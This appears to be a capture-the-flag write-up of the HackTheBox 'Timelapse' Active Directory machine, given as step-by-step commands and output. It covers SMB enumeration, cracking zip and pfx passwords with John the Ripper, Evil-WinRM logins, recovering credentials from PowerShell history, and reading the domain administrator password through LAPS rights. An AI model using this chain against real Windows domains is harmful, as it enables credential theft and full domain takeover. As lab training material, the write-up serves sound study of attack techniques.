HackTheBoxActiveDirectoryWindowsVulnLabs

Timelapse

another easy AD box on HTB

nmap revealed the following port 53, 88, 135, 139, 389, 445, 464, 593, 636, 3268, 3269, 5986, 9389, 49667, 49674, 49693, 53255 when querying for service and version information it returns

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-02-28 21:52:28Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5986/tcp  open  ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after:  2022-10-25T14:25:29
| tls-alpn: 
|_  http/1.1
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
|_ssl-date: 2026-02-28T22:03:30+00:00; +7h59m59s from scanner time.
9389/tcp  open  mc-nmf   .NET Message Framing
49667/tcp open  msrpc    Microsoft Windows RPC
49674/tcp open  msrpc    Microsoft Windows RPC
49693/tcp open  msrpc    Microsoft Windows RPC
53255/tcp open  msrpc    Microsoft Windows RPC

we can access smb with anonymous access. In SMB, there is a share called Shares, in Shares\Dev there is a file called winrm_backup.zip(from my experience, it would probably be of a cer).

After moving it to my system, I realized it was password-protected, so first I extracted its hash using

john2zip winrm_backup.zip > winrm.hash

now crack it using johntheripper, using

john --wordlist=rockyou.txt winrm.hash

Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)     
1g 0:00:00:00 DONE (2026-02-28 08:10) 3.333g/s 11578Kp/s 11578Kc/s 11578KC/s surkerior..superkebab
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

cracked hash revealed the password to be "supremelegacy". Inside this zip file there was a legacyy_dev_auth.pfx, which was again password protected. I extracted it's hash using

john2pfx legacyy_dev_auth.pfx pfx.hash

and cracked the password using

john --wordlist=rockyou.txt pfx.hash

Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy       (legacyy_dev_auth.pfx)     
1g 0:00:00:29 DONE (2026-02-28 08:14) 0.03350g/s 108266p/s 108266c/s 108266C/s thuglife06..thsco04
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Now I extracted the private key file using

openssl pkcs12 -in legacyy_dev_auth.pfx -nodes -out full.pem

and entered the password "thuglegacy" when prompted now we can easily get a shell using this key file and Evil-WinRM using

evil-winrm -i 10.129.227.113 -c full.pem -k full.pem -S

Now checking the powershell history using

type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

we get

whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

this gave us username and password svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV now using these credentials. We will login Evil-Winrm

evil-winrm -i 10.129.227.113 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S

Using net user svc_deploy we can see that svc_deploy is a part of LAPS_Readers group (LAPS is used to manage local account passwords of AD computers). Using AdmPwd.PS we can exploit LAPS rights and and get the clear text password. To first see which objects can be managed by LAPS we can use the following command

Find-AdmPwdExtendedRights -identity *

it gives us

Name                 DistinguishedName                                                 Status
----                 -----------------                                                 ------
Domain Controllers   OU=Domain Controllers,DC=timelapse,DC=htb                         Delegated
Servers              OU=Servers,DC=timelapse,DC=htb                                    Delegated
Database             OU=Database,OU=Servers,DC=timelapse,DC=htb                        Delegated
Web                  OU=Web,OU=Servers,DC=timelapse,DC=htb                             Delegated
Dev                  OU=Dev,OU=Servers,DC=timelapse,DC=htb                             Delegated
Staff                OU=Staff,DC=timelapse,DC=htb                                      Delegated
Admins               OU=Admins,OU=Staff,DC=timelapse,DC=htb                            Delegated
Dev                  OU=Dev,OU=Staff,DC=timelapse,DC=htb                               Delegated
HelpDesk             OU=HelpDesk,OU=Staff,DC=timelapse,DC=htb                          Delegated
Groups               OU=Groups,OU=Staff,DC=timelapse,DC=htb                            Delegated

Now we will get the clear-text password using

get-admpwdpassword -computername dc01 | Select password

It gives us the password and using that password in Evil-WinRM we can easily get the root flag

evil-winrm -i 10.129.227.113 -u administrator -p '!9jz(2D7.L#E%J8(7N148065' -S

PreviousForest NextActive

Last updated 17 days ago